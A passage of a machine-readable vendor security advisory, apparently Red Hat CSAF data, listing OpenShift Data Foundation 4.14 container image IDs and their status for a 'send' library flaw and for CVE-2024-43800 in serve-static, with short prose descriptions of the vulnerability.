"9Base-RHODF-4.14:odf4/mcg-rhel9-operator@sha256:bb82af60a467551305c8628e6c8bac0b0d01637a0fb04b4142e69c90d3003434_arm64",
"9Base-RHODF-4.14:odf4/mcg-rhel9-operator@sha256:fc98e8793dac5fcdb663967a7fd27c03d4cbb38295a5b1138f30cc1936bec92b_amd64",
"9Base-RHODF-4.14:odf4/ocs-client-console-rhel9@sha256:3d2aba1307256ae6ee3a2dffaf0d175f7d204f7484712c1ec083d74203de2cb8_ppc64le",
"9Base-RHODF-4.14:odf4/ocs-client-console-rhel9@sha256:5e05fc58b6b37b6e6f45a0042d3b167760fcc3dd5d14f4620a889d5feb90ae76_amd64",
"9Base-RHODF-4.14:odf4/ocs-client-console-rhel9@sha256:f5976d4c7303ddb27dd91f33517af1e74cdf42e3539219c30c0c87408a085f95_s390x",
"9Base-RHODF-4.14:odf4/ocs-client-operator-bundle@sha256:23aad767b433979e8465b4420278bf41a729e32530f80ef3bb3e98466afca95f_amd64",
"9Base-RHODF-4.14:odf4/ocs-client-operator-bundle@sha256:3e398e98250d9638c8ad75bf88ae2cb936d499c1ebf0d0cc897ce37fbb25b42b_ppc64le",
"9Base-RHODF-4.14:odf4/ocs-client-operator-bundle@sha256:59921e0c5c495c57a8efd9022b95bf0964fff99ba6f207cd49ed3b0112189f45_s390x",
"9Base-RHODF-4.14:odf4/ocs-client-rhel9-operator@sha256:12fa0510c846a2f2d7984ab844faf117848aa9b70bf1642e140a20729fea3b4a_ppc64le",
"9Base-RHODF-4.14:odf4/ocs-client-rhel9-operator@sha256:aeabac054147c3be143ddfcc48702332a58d17a31e461c1cf863fa273a5364e0_arm64",
"9Base-RHODF-4.14:odf4/ocs-client-rhel9-operator@sha256:afcecc910feb27ffc8c48ce6aa52f2d305fd785b7a31e8d035d14f771f9993ae_amd64",
"9Base-RHODF-4.14:odf4/ocs-client-rhel9-operator@sha256:f0fab98314e526b530a06a4859cab011647358ea65827288bd12d97ac1cf6e38_s390x",
"9Base-RHODF-4.14:odf4/ocs-metrics-exporter-rhel9@sha256:06c5ad2463ba39e95ad251fd388b2c604deec27da05ef2c4d98952173eb56787_s390x",
"9Base-RHODF-4.14:odf4/ocs-metrics-exporter-rhel9@sha256:9038bc5b6d2713e79672f2f574ebe849bb15dccc025a38fc2380e443430f05e6_ppc64le",
"9Base-RHODF-4.14:odf4/ocs-metrics-exporter-rhel9@sha256:cfbbab395069de17bb86357e54d2a6a89e5fe671b938b7a42e4c8ab1eb951e49_amd64",
"9Base-RHODF-4.14:odf4/ocs-operator-bundle@sha256:3d161f9b4d88c502382b32abe4392af4a5b141fa11851f335f32745c090971a5_ppc64le",
"9Base-RHODF-4.14:odf4/ocs-operator-bundle@sha256:a967f7349b22cc96c11191bf31c002ef6fec7fd4214398df29ecdb7c72d4718c_s390x",
"9Base-RHODF-4.14:odf4/ocs-operator-bundle@sha256:b2cf0ade1d9c2e16e4fec4e2886691f5e4d95210bdf68377cd22aa6a3bd409d4_amd64",
"9Base-RHODF-4.14:odf4/ocs-rhel9-operator@sha256:215778987ac0f6449b168481b84a8b253cd4577711055ca66d259fdbf37e9af9_s390x",
"9Base-RHODF-4.14:odf4/ocs-rhel9-operator@sha256:60b08d3094ed01d2e5570973964f08cd9a81c794b1e187d595dc735436004cc2_arm64",
"9Base-RHODF-4.14:odf4/ocs-rhel9-operator@sha256:7c98d7e882e06d09322f9eefcd67a26a9b96e81708a1c2d9095c93e280bee66a_amd64",
"9Base-RHODF-4.14:odf4/ocs-rhel9-operator@sha256:e81785d999d583b8a57e6be3eecc7edfa042552e4ae0c2a18460316a68828fb1_ppc64le",
"9Base-RHODF-4.14:odf4/odf-console-rhel9@sha256:521022da39600a31fd4f1e3f72cfbc5c9315a53de21df57be71a63e4050a4491_ppc64le",
"9Base-RHODF-4.14:odf4/odf-console-rhel9@sha256:88ddde7411b0ce4b0edd53e0b64c76afa8038fc4a8aa1450220e515759c30036_amd64",
"9Base-RHODF-4.14:odf4/odf-console-rhel9@sha256:9c676d4cea288ae80afe61e6c2c2009da9969508aebd8eebce0f21513ba505f9_s390x",
"9Base-RHODF-4.14:odf4/odf-cosi-sidecar-rhel9@sha256:7bd34f3be6e5a6e689ede195ef1b29843b5eb0cf839021816c7e57819b0d496e_s390x",
"9Base-RHODF-4.14:odf4/odf-cosi-sidecar-rhel9@sha256:cada6c55b8adbafd7238399b13748432b4e2937eb5aa7b1c0d40573983f4b953_amd64",
"9Base-RHODF-4.14:odf4/odf-cosi-sidecar-rhel9@sha256:df2648d2c5f839bde961fe8e3badbaf6cf72c7b62c133b1cb27c4ee7e66ac5f0_ppc64le",
"9Base-RHODF-4.14:odf4/odf-csi-addons-operator-bundle@sha256:b16ddba3e229faf0aa5d01f0dd6452872c6a44679a74359979a9c09c595bbcc8_s390x",
"9Base-RHODF-4.14:odf4/odf-csi-addons-operator-bundle@sha256:c4b1229ac6308e623a660b37b3f52870eac8c9566d2068173ffadc52aee8da12_ppc64le",
"9Base-RHODF-4.14:odf4/odf-csi-addons-operator-bundle@sha256:ef593bb97792c40a0706924dbfbc9dd0072d0889b92678b8ebaf55227d66f5a4_amd64",
"9Base-RHODF-4.14:odf4/odf-csi-addons-rhel9-operator@sha256:326cb06c987e275b1c1c7c9fef1e96d343223ee150ed3c58cfc42ccf4765fe03_ppc64le",
"9Base-RHODF-4.14:odf4/odf-csi-addons-rhel9-operator@sha256:3366ad94a8cba707735d4cbbc692221b62a5fbef387edb70e3660f55ae718e7a_arm64",
"9Base-RHODF-4.14:odf4/odf-csi-addons-rhel9-operator@sha256:ccd9cdb192b4275b9c7bb58b72df90df0ad6ff807e2f00ed04710655042f66d5_amd64",
"9Base-RHODF-4.14:odf4/odf-csi-addons-rhel9-operator@sha256:f3ab303fdafcbef708c92a33ad0775fdae4744735ae600e7aa692e62a7fade10_s390x",
"9Base-RHODF-4.14:odf4/odf-csi-addons-sidecar-rhel9@sha256:09d88b10bd0e674f5d0efae7b6a2d98db7634e2b594a44dbdae35d6a872fb0c0_amd64",
"9Base-RHODF-4.14:odf4/odf-csi-addons-sidecar-rhel9@sha256:4e2db57173669e54f65196c175d5e47e74076d8164f57f90da86fcef8aa92281_arm64",
"9Base-RHODF-4.14:odf4/odf-csi-addons-sidecar-rhel9@sha256:5d8e98b7f5b07f77e707cf73673dcf4648624da51d34d561d6bdc2b3fde8f541_s390x",
"9Base-RHODF-4.14:odf4/odf-csi-addons-sidecar-rhel9@sha256:bac9dfa4b2d31316e0fcabc3e2c87c830c7e410d0b9c0e485ae62ea4da79d2c4_ppc64le",
"9Base-RHODF-4.14:odf4/odf-multicluster-console-rhel9@sha256:171817821112bd026a41faae5cf98fd06ed5d0cf063d622f24fa695bcb1213b4_amd64",
"9Base-RHODF-4.14:odf4/odf-multicluster-console-rhel9@sha256:68c42668721898d68bc3b255bedca2124dee662626542793c9bfadc520d473c8_ppc64le",
"9Base-RHODF-4.14:odf4/odf-multicluster-console-rhel9@sha256:85505b18dc32d34de3f9d6ca779acc84e8c500f106460502597f00fe8626509b_s390x",
"9Base-RHODF-4.14:odf4/odf-multicluster-operator-bundle@sha256:11968f525a32bdd28d90ecc8b0eb32838c4eab155a77f0453685dc346f5c106d_amd64",
"9Base-RHODF-4.14:odf4/odf-multicluster-operator-bundle@sha256:389291fcc275966724880ec3f8b6732020027e162e515684e889a76c686d8163_s390x",
"9Base-RHODF-4.14:odf4/odf-multicluster-operator-bundle@sha256:73448db0de00c6a40ed20d0d167b7e98f89c8e3eebc45f675cc210e27bd95c0c_ppc64le",
"9Base-RHODF-4.14:odf4/odf-multicluster-rhel9-operator@sha256:08bd33241646abb79e57a6de5aac3611f0f3238c11dfa76bd135e8fc745eaf97_ppc64le",
"9Base-RHODF-4.14:odf4/odf-multicluster-rhel9-operator@sha256:2baf3d66710d7673ea20562912597b058a3d0a9b428bdf1ba792d0624c31f284_s390x",
"9Base-RHODF-4.14:odf4/odf-multicluster-rhel9-operator@sha256:59e97364ffd0cf0b64f95cbb65dcfcac7d982bffc98dd87e64a5c0e0d114e36b_arm64",
"9Base-RHODF-4.14:odf4/odf-multicluster-rhel9-operator@sha256:eb4626677b340ac11237dc9269071732b45642238afb3afdabe7acf535464fda_amd64",
"9Base-RHODF-4.14:odf4/odf-must-gather-rhel9@sha256:1318f5f3119a2b9a5b22e7687d3b1d5212394dda2d95b6e02c98b8ffcb87660f_amd64",
"9Base-RHODF-4.14:odf4/odf-must-gather-rhel9@sha256:722eadfcf62be37bf9d714ac4336440ed98615269423c3ba3b65b70b6c6acd29_arm64",
"9Base-RHODF-4.14:odf4/odf-must-gather-rhel9@sha256:a0ef2966b464a5602ab2d936772dc74ca55212a11c0ec0f19db5ff61d66c2980_ppc64le",
"9Base-RHODF-4.14:odf4/odf-must-gather-rhel9@sha256:d64b01bd4ace2795a62a7bfb2b385930e46f76eb12cede706d10b16ba0707750_s390x",
"9Base-RHODF-4.14:odf4/odf-operator-bundle@sha256:26459b59f76a3e8cc6fed7907b044921fa61a27d91c3b174ea7f35d120d99a6e_ppc64le",
"9Base-RHODF-4.14:odf4/odf-operator-bundle@sha256:4412748a0cf46c60539a4fefdc8390040a5c61fa8eee6137a8a402dcef9ddb01_amd64",
"9Base-RHODF-4.14:odf4/odf-operator-bundle@sha256:b9c877af1b71bf3ec5f6025353c9d9b37e457e120ea0815c9090490a6b2217fd_s390x",
"9Base-RHODF-4.14:odf4/odf-rhel9-operator@sha256:168d1924a17a77cc3a473bf48a90bfd3cb3134d30a667cbbf378fc96b3ad5803_amd64",
"9Base-RHODF-4.14:odf4/odf-rhel9-operator@sha256:4a42286f3a5c31625fe29085c81627325006d6c1b63e8ad3c90b2bfa383b2439_s390x",
"9Base-RHODF-4.14:odf4/odf-rhel9-operator@sha256:7609f4687626d3b178e211cc587b642acc688acd17274551bde6828ca5e702e5_ppc64le",
"9Base-RHODF-4.14:odf4/odf-rhel9-operator@sha256:d1c814e55d7f91d8b096bf0983041e678ece0034fb3990630565ae32791d5d7c_arm64",
"9Base-RHODF-4.14:odf4/odr-cluster-operator-bundle@sha256:91bf46b7a774f08aba77f25203cb4bfa2aa44073a50807b942190702c2364eff_s390x",
"9Base-RHODF-4.14:odf4/odr-cluster-operator-bundle@sha256:a79234b0659b2e45b7661a7b86f658dedc01e7b9ff858251a26dab3a42650993_amd64",
"9Base-RHODF-4.14:odf4/odr-cluster-operator-bundle@sha256:de86c539ff9dfe81d04cecee6fbd6ded1e8b4a3b598d855aa5c6baa98cf10d45_ppc64le",
"9Base-RHODF-4.14:odf4/odr-hub-operator-bundle@sha256:14c3b888aff944bafe415da999e6c4d43f830f4ebe7bc1d681f92f0037751687_s390x",
"9Base-RHODF-4.14:odf4/odr-hub-operator-bundle@sha256:2094cba9cbcf69f44a9176a5f8906f3faa95e0914272922311d0a9a28ca437bf_ppc64le",
"9Base-RHODF-4.14:odf4/odr-hub-operator-bundle@sha256:ad8244e09fdbd18c7c9ee1bd398fbb36fbc403fba0e59553d037018351dba05d_amd64",
"9Base-RHODF-4.14:odf4/odr-rhel9-operator@sha256:06b747af12530dd66554af69f072c35622fb57fbff9094b71dcc379ef13faa71_ppc64le",
"9Base-RHODF-4.14:odf4/odr-rhel9-operator@sha256:6447bd5f6546704b4b8762c8c00dcd27141a0943fea33a02ee621087b4f353cf_s390x",
"9Base-RHODF-4.14:odf4/odr-rhel9-operator@sha256:8be0734337b11f5bb35cdbd93dc3b93d37c66770b238bd26de673026ef201e62_arm64",
"9Base-RHODF-4.14:odf4/odr-rhel9-operator@sha256:c49b2c30b19d5f0c13782910214819fc1a18b48c0f8a0d3064b2b4af24e1567f_amd64",
"9Base-RHODF-4.14:odf4/rook-ceph-rhel9-operator@sha256:057af5f435a7ed786bdca3db5219fc58152dbe4e9afa997b91e5f6e930534025_amd64",
"9Base-RHODF-4.14:odf4/rook-ceph-rhel9-operator@sha256:210ff59e38d274b3ad678b826078bdc896cb5f950ad2221724c03bda6939138b_ppc64le",
"9Base-RHODF-4.14:odf4/rook-ceph-rhel9-operator@sha256:df1f250b1d40440eb8a5d97f3c2641f01b81d99fd67c42d14c6f89183f5486fd_s390x"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "send: Code Execution Vulnerability in Send Library"
},
{
"cve": "CVE-2024-43800",
"cwe": {
"id": "CWE-79",
"name": "Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027)"
},
"discovery_date": "2024-09-10T15:30:33.631718+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"9Base-RHODF-4.14:odf4/cephcsi-rhel9@sha256:08a046ba8c5a9284e7fc9263f51eee40a5203c5d41c25ac2df555694dbd5a395_s390x",
"9Base-RHODF-4.14:odf4/cephcsi-rhel9@sha256:6b2cb0576d635bfeef719847a6b3a651b5527a0336fe57548ae609025ddb2016_amd64",
"9Base-RHODF-4.14:odf4/cephcsi-rhel9@sha256:984f5852a4793d9883106ccca492b1daab60d3c85f21ad667f92efbe8e5d1c50_ppc64le",
"9Base-RHODF-4.14:odf4/mcg-cli-rhel9@sha256:0f8ea96fc58192660d845131c760a258a8e33fc02fc85884aa9be5ea07fd5e26_arm64",
"9Base-RHODF-4.14:odf4/mcg-cli-rhel9@sha256:1f9ed27e2bd7b881aa5bc06571cf1cd459d577746e01f388bef01679013958f5_s390x",
"9Base-RHODF-4.14:odf4/mcg-cli-rhel9@sha256:a665d06e0ec627db26cf47e0e19a36793f185fbf7dcb2a756983b0c08d041a09_ppc64le",
"9Base-RHODF-4.14:odf4/mcg-cli-rhel9@sha256:e33c0ee4709e501d0a25c9da0089cb28b79ee80d28706465b55b9b17f807d260_amd64",
"9Base-RHODF-4.14:odf4/mcg-core-rhel9@sha256:8d8230c10fa25e17fdac866971ecbdcec369e998f4f965eab27abab46d1eaf4d_amd64",
"9Base-RHODF-4.14:odf4/mcg-core-rhel9@sha256:8dbb2f97682ab4a0f88e4b63485738f591a002faded8d1e5a01f918abd0a22b5_arm64",
"9Base-RHODF-4.14:odf4/mcg-core-rhel9@sha256:bc5578e6f07cd0692abd897bf25b99361f1044a10ddcefefae13d3af338b3d58_ppc64le",
"9Base-RHODF-4.14:odf4/mcg-core-rhel9@sha256:cf73fc2fa89884542a1f0e333bd9e1dd587a05e86442d67a316cd1c1d26c925d_s390x",
"9Base-RHODF-4.14:odf4/mcg-operator-bundle@sha256:a42cd3a47eae7d05c44b438321da63faaee8274e4099171ec30c75005526f05d_ppc64le",
"9Base-RHODF-4.14:odf4/mcg-operator-bundle@sha256:a73e671a9db5b88691800cefb2c903e7012499bc857e6cca62af958a35b5eab6_s390x",
"9Base-RHODF-4.14:odf4/mcg-operator-bundle@sha256:f034e4be8b4e4e29ae79b12b800bf9ea682fa006a3ba6e84f42e06167a239750_amd64",
"9Base-RHODF-4.14:odf4/mcg-rhel9-operator@sha256:0af9a6828abb53c18dae132b6a91862a85b5ad0b3f3ffbded002955af2fd04e2_s390x",
"9Base-RHODF-4.14:odf4/mcg-rhel9-operator@sha256:1e20312fdd047dfd87b67d0bdc6a493df330c58671bcd0e078f22686df4a8d66_ppc64le",
"9Base-RHODF-4.14:odf4/mcg-rhel9-operator@sha256:bb82af60a467551305c8628e6c8bac0b0d01637a0fb04b4142e69c90d3003434_arm64",
"9Base-RHODF-4.14:odf4/mcg-rhel9-operator@sha256:fc98e8793dac5fcdb663967a7fd27c03d4cbb38295a5b1138f30cc1936bec92b_amd64",
"9Base-RHODF-4.14:odf4/ocs-client-operator-bundle@sha256:23aad767b433979e8465b4420278bf41a729e32530f80ef3bb3e98466afca95f_amd64",
"9Base-RHODF-4.14:odf4/ocs-client-operator-bundle@sha256:3e398e98250d9638c8ad75bf88ae2cb936d499c1ebf0d0cc897ce37fbb25b42b_ppc64le",
"9Base-RHODF-4.14:odf4/ocs-client-operator-bundle@sha256:59921e0c5c495c57a8efd9022b95bf0964fff99ba6f207cd49ed3b0112189f45_s390x",
"9Base-RHODF-4.14:odf4/ocs-client-rhel9-operator@sha256:12fa0510c846a2f2d7984ab844faf117848aa9b70bf1642e140a20729fea3b4a_ppc64le",
"9Base-RHODF-4.14:odf4/ocs-client-rhel9-operator@sha256:aeabac054147c3be143ddfcc48702332a58d17a31e461c1cf863fa273a5364e0_arm64",
"9Base-RHODF-4.14:odf4/ocs-client-rhel9-operator@sha256:afcecc910feb27ffc8c48ce6aa52f2d305fd785b7a31e8d035d14f771f9993ae_amd64",
"9Base-RHODF-4.14:odf4/ocs-client-rhel9-operator@sha256:f0fab98314e526b530a06a4859cab011647358ea65827288bd12d97ac1cf6e38_s390x",
"9Base-RHODF-4.14:odf4/ocs-metrics-exporter-rhel9@sha256:06c5ad2463ba39e95ad251fd388b2c604deec27da05ef2c4d98952173eb56787_s390x",
"9Base-RHODF-4.14:odf4/ocs-metrics-exporter-rhel9@sha256:9038bc5b6d2713e79672f2f574ebe849bb15dccc025a38fc2380e443430f05e6_ppc64le",
"9Base-RHODF-4.14:odf4/ocs-metrics-exporter-rhel9@sha256:cfbbab395069de17bb86357e54d2a6a89e5fe671b938b7a42e4c8ab1eb951e49_amd64",
"9Base-RHODF-4.14:odf4/ocs-operator-bundle@sha256:3d161f9b4d88c502382b32abe4392af4a5b141fa11851f335f32745c090971a5_ppc64le",
"9Base-RHODF-4.14:odf4/ocs-operator-bundle@sha256:a967f7349b22cc96c11191bf31c002ef6fec7fd4214398df29ecdb7c72d4718c_s390x",
"9Base-RHODF-4.14:odf4/ocs-operator-bundle@sha256:b2cf0ade1d9c2e16e4fec4e2886691f5e4d95210bdf68377cd22aa6a3bd409d4_amd64",
"9Base-RHODF-4.14:odf4/ocs-rhel9-operator@sha256:215778987ac0f6449b168481b84a8b253cd4577711055ca66d259fdbf37e9af9_s390x",
"9Base-RHODF-4.14:odf4/ocs-rhel9-operator@sha256:60b08d3094ed01d2e5570973964f08cd9a81c794b1e187d595dc735436004cc2_arm64",
"9Base-RHODF-4.14:odf4/ocs-rhel9-operator@sha256:7c98d7e882e06d09322f9eefcd67a26a9b96e81708a1c2d9095c93e280bee66a_amd64",
"9Base-RHODF-4.14:odf4/ocs-rhel9-operator@sha256:e81785d999d583b8a57e6be3eecc7edfa042552e4ae0c2a18460316a68828fb1_ppc64le",
"9Base-RHODF-4.14:odf4/odf-cosi-sidecar-rhel9@sha256:7bd34f3be6e5a6e689ede195ef1b29843b5eb0cf839021816c7e57819b0d496e_s390x",
"9Base-RHODF-4.14:odf4/odf-cosi-sidecar-rhel9@sha256:cada6c55b8adbafd7238399b13748432b4e2937eb5aa7b1c0d40573983f4b953_amd64",
"9Base-RHODF-4.14:odf4/odf-cosi-sidecar-rhel9@sha256:df2648d2c5f839bde961fe8e3badbaf6cf72c7b62c133b1cb27c4ee7e66ac5f0_ppc64le",
"9Base-RHODF-4.14:odf4/odf-csi-addons-operator-bundle@sha256:b16ddba3e229faf0aa5d01f0dd6452872c6a44679a74359979a9c09c595bbcc8_s390x",
"9Base-RHODF-4.14:odf4/odf-csi-addons-operator-bundle@sha256:c4b1229ac6308e623a660b37b3f52870eac8c9566d2068173ffadc52aee8da12_ppc64le",
"9Base-RHODF-4.14:odf4/odf-csi-addons-operator-bundle@sha256:ef593bb97792c40a0706924dbfbc9dd0072d0889b92678b8ebaf55227d66f5a4_amd64",
"9Base-RHODF-4.14:odf4/odf-csi-addons-rhel9-operator@sha256:326cb06c987e275b1c1c7c9fef1e96d343223ee150ed3c58cfc42ccf4765fe03_ppc64le",
"9Base-RHODF-4.14:odf4/odf-csi-addons-rhel9-operator@sha256:3366ad94a8cba707735d4cbbc692221b62a5fbef387edb70e3660f55ae718e7a_arm64",
"9Base-RHODF-4.14:odf4/odf-csi-addons-rhel9-operator@sha256:ccd9cdb192b4275b9c7bb58b72df90df0ad6ff807e2f00ed04710655042f66d5_amd64",
"9Base-RHODF-4.14:odf4/odf-csi-addons-rhel9-operator@sha256:f3ab303fdafcbef708c92a33ad0775fdae4744735ae600e7aa692e62a7fade10_s390x",
"9Base-RHODF-4.14:odf4/odf-csi-addons-sidecar-rhel9@sha256:09d88b10bd0e674f5d0efae7b6a2d98db7634e2b594a44dbdae35d6a872fb0c0_amd64",
"9Base-RHODF-4.14:odf4/odf-csi-addons-sidecar-rhel9@sha256:4e2db57173669e54f65196c175d5e47e74076d8164f57f90da86fcef8aa92281_arm64",
"9Base-RHODF-4.14:odf4/odf-csi-addons-sidecar-rhel9@sha256:5d8e98b7f5b07f77e707cf73673dcf4648624da51d34d561d6bdc2b3fde8f541_s390x",
"9Base-RHODF-4.14:odf4/odf-csi-addons-sidecar-rhel9@sha256:bac9dfa4b2d31316e0fcabc3e2c87c830c7e410d0b9c0e485ae62ea4da79d2c4_ppc64le",
"9Base-RHODF-4.14:odf4/odf-multicluster-operator-bundle@sha256:11968f525a32bdd28d90ecc8b0eb32838c4eab155a77f0453685dc346f5c106d_amd64",
"9Base-RHODF-4.14:odf4/odf-multicluster-operator-bundle@sha256:389291fcc275966724880ec3f8b6732020027e162e515684e889a76c686d8163_s390x",
"9Base-RHODF-4.14:odf4/odf-multicluster-operator-bundle@sha256:73448db0de00c6a40ed20d0d167b7e98f89c8e3eebc45f675cc210e27bd95c0c_ppc64le",
"9Base-RHODF-4.14:odf4/odf-multicluster-rhel9-operator@sha256:08bd33241646abb79e57a6de5aac3611f0f3238c11dfa76bd135e8fc745eaf97_ppc64le",
"9Base-RHODF-4.14:odf4/odf-multicluster-rhel9-operator@sha256:2baf3d66710d7673ea20562912597b058a3d0a9b428bdf1ba792d0624c31f284_s390x",
"9Base-RHODF-4.14:odf4/odf-multicluster-rhel9-operator@sha256:59e97364ffd0cf0b64f95cbb65dcfcac7d982bffc98dd87e64a5c0e0d114e36b_arm64",
"9Base-RHODF-4.14:odf4/odf-multicluster-rhel9-operator@sha256:eb4626677b340ac11237dc9269071732b45642238afb3afdabe7acf535464fda_amd64",
"9Base-RHODF-4.14:odf4/odf-must-gather-rhel9@sha256:1318f5f3119a2b9a5b22e7687d3b1d5212394dda2d95b6e02c98b8ffcb87660f_amd64",
"9Base-RHODF-4.14:odf4/odf-must-gather-rhel9@sha256:722eadfcf62be37bf9d714ac4336440ed98615269423c3ba3b65b70b6c6acd29_arm64",
"9Base-RHODF-4.14:odf4/odf-must-gather-rhel9@sha256:a0ef2966b464a5602ab2d936772dc74ca55212a11c0ec0f19db5ff61d66c2980_ppc64le",
"9Base-RHODF-4.14:odf4/odf-must-gather-rhel9@sha256:d64b01bd4ace2795a62a7bfb2b385930e46f76eb12cede706d10b16ba0707750_s390x",
"9Base-RHODF-4.14:odf4/odf-operator-bundle@sha256:26459b59f76a3e8cc6fed7907b044921fa61a27d91c3b174ea7f35d120d99a6e_ppc64le",
"9Base-RHODF-4.14:odf4/odf-operator-bundle@sha256:4412748a0cf46c60539a4fefdc8390040a5c61fa8eee6137a8a402dcef9ddb01_amd64",
"9Base-RHODF-4.14:odf4/odf-operator-bundle@sha256:b9c877af1b71bf3ec5f6025353c9d9b37e457e120ea0815c9090490a6b2217fd_s390x",
"9Base-RHODF-4.14:odf4/odf-rhel9-operator@sha256:168d1924a17a77cc3a473bf48a90bfd3cb3134d30a667cbbf378fc96b3ad5803_amd64",
"9Base-RHODF-4.14:odf4/odf-rhel9-operator@sha256:4a42286f3a5c31625fe29085c81627325006d6c1b63e8ad3c90b2bfa383b2439_s390x",
"9Base-RHODF-4.14:odf4/odf-rhel9-operator@sha256:7609f4687626d3b178e211cc587b642acc688acd17274551bde6828ca5e702e5_ppc64le",
"9Base-RHODF-4.14:odf4/odf-rhel9-operator@sha256:d1c814e55d7f91d8b096bf0983041e678ece0034fb3990630565ae32791d5d7c_arm64",
"9Base-RHODF-4.14:odf4/odr-cluster-operator-bundle@sha256:91bf46b7a774f08aba77f25203cb4bfa2aa44073a50807b942190702c2364eff_s390x",
"9Base-RHODF-4.14:odf4/odr-cluster-operator-bundle@sha256:a79234b0659b2e45b7661a7b86f658dedc01e7b9ff858251a26dab3a42650993_amd64",
"9Base-RHODF-4.14:odf4/odr-cluster-operator-bundle@sha256:de86c539ff9dfe81d04cecee6fbd6ded1e8b4a3b598d855aa5c6baa98cf10d45_ppc64le",
"9Base-RHODF-4.14:odf4/odr-hub-operator-bundle@sha256:14c3b888aff944bafe415da999e6c4d43f830f4ebe7bc1d681f92f0037751687_s390x",
"9Base-RHODF-4.14:odf4/odr-hub-operator-bundle@sha256:2094cba9cbcf69f44a9176a5f8906f3faa95e0914272922311d0a9a28ca437bf_ppc64le",
"9Base-RHODF-4.14:odf4/odr-hub-operator-bundle@sha256:ad8244e09fdbd18c7c9ee1bd398fbb36fbc403fba0e59553d037018351dba05d_amd64",
"9Base-RHODF-4.14:odf4/odr-rhel9-operator@sha256:06b747af12530dd66554af69f072c35622fb57fbff9094b71dcc379ef13faa71_ppc64le",
"9Base-RHODF-4.14:odf4/odr-rhel9-operator@sha256:6447bd5f6546704b4b8762c8c00dcd27141a0943fea33a02ee621087b4f353cf_s390x",
"9Base-RHODF-4.14:odf4/odr-rhel9-operator@sha256:8be0734337b11f5bb35cdbd93dc3b93d37c66770b238bd26de673026ef201e62_arm64",
"9Base-RHODF-4.14:odf4/odr-rhel9-operator@sha256:c49b2c30b19d5f0c13782910214819fc1a18b48c0f8a0d3064b2b4af24e1567f_amd64",
"9Base-RHODF-4.14:odf4/rook-ceph-rhel9-operator@sha256:057af5f435a7ed786bdca3db5219fc58152dbe4e9afa997b91e5f6e930534025_amd64",
"9Base-RHODF-4.14:odf4/rook-ceph-rhel9-operator@sha256:210ff59e38d274b3ad678b826078bdc896cb5f950ad2221724c03bda6939138b_ppc64le",
"9Base-RHODF-4.14:odf4/rook-ceph-rhel9-operator@sha256:df1f250b1d40440eb8a5d97f3c2641f01b81d99fd67c42d14c6f89183f5486fd_s390x"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2311154"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in serve-static. This issue may allow the execution of untrusted code via passing sanitized yet untrusted user input to redirect().",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "serve-static: Improper Sanitization in serve-static",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "rhdh-hub-container 1.2 and 1.3 have included patches for this vulnerability.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"9Base-RHODF-4.14:odf4/ocs-client-console-rhel9@sha256:3d2aba1307256ae6ee3a2dffaf0d175f7d204f7484712c1ec083d74203de2cb8_ppc64le",
"9Base-RHODF-4.14:odf4/ocs-client-console-rhel9@sha256:5e05fc58b6b37b6e6f45a0042d3b167760fcc3dd5d14f4620a889d5feb90ae76_amd64",
"9Base-RHODF-4.14:odf4/ocs-client-console-rhel9@sha256:f5976d4c7303ddb27dd91f33517af1e74cdf42e3539219c30c0c87408a085f95_s390x",
"9Base-RHODF-4.14:odf4/odf-console-rhel9@sha256:521022da39600a31fd4f1e3f72cfbc5c9315a53de21df57be71a63e4050a4491_ppc64le",
"9Base-RHODF-4.14:odf4/odf-console-rhel9@sha256:88ddde7411b0ce4b0edd53e0b64c76afa8038fc4a8aa1450220e515759c30036_amd64",
"9Base-RHODF-4.14:odf4/odf-console-rhel9@sha256:9c676d4cea288ae80afe61e6c2c2009da9969508aebd8eebce0f21513ba505f9_s390x",
"9Base-RHODF-4.14:odf4/odf-multicluster-console-rhel9@sha256:171817821112bd026a41faae5cf98fd06ed5d0cf063d622f24fa695bcb1213b4_amd64",
"9Base-RHODF-4.14:odf4/odf-multicluster-console-rhel9@sha256:68c42668721898d68bc3b255bedca2124dee662626542793c9bfadc520d473c8_ppc64le",
"9Base-RHODF-4.14:odf4/odf-multicluster-console-rhel9@sha256:85505b18dc32d34de3f9d6ca779acc84e8c500f106460502597f00fe8626509b_s390x"
],
"known_not_affected": [
"9Base-RHODF-4.14:odf4/cephcsi-rhel9@sha256:08a046ba8c5a9284e7fc9263f51eee40a5203c5d41c25ac2df555694dbd5a395_s390x",
"9Base-RHODF-4.14:odf4/cephcsi-rhel9@sha256:6b2cb0576d635bfeef719847a6b3a651b5527a0336fe57548ae609025ddb2016_amd64",
"9Base-RHODF-4.14:odf4/cephcsi-rhel9@sha256:984f5852a4793d9883106ccca492b1daab60d3c85f21ad667f92efbe8e5d1c50_ppc64le",
"9Base-RHODF-4.14:odf4/mcg-cli-rhel9@sha256:0f8ea96fc58192660d845131c760a258a8e33fc02fc85884aa9be5ea07fd5e26_arm64",
"9Base-RHODF-4.14:odf4/mcg-cli-rhel9@sha256:1f9ed27e2bd7b881aa5bc06571cf1cd459d577746e01f388bef01679013958f5_s390x",
"9Base-RHODF-4.14:odf4/mcg-cli-rhel9@sha256:a665d06e0ec627db26cf47e0e19a36793f185fbf7dcb2a756983b0c08d041a09_ppc64le",
"9Base-RHODF-4.14:odf4/mcg-cli-rhel9@sha256:e33c0ee4709e501d0a25c9da0089cb28b79ee80d28706465b55b9b17f807d260_amd64",
"9Base-RHODF-4.14:odf4/mcg-core-rhel9@sha256:8d8230c10fa25e17fdac866971ecbdcec369e998f4f965eab27abab46d1eaf4d_amd64",
"9Base-RHODF-4.14:odf4/mcg-core-rhel9@sha256:8dbb2f97682ab4a0f88e4b63485738f591a002faded8d1e5a01f918abd0a22b5_arm64",
"9Base-RHODF-4.14:odf4/mcg-core-rhel9@sha256:bc5578e6f07cd0692abd897bf25b99361f1044a10ddcefefae13d3af338b3d58_ppc64le",
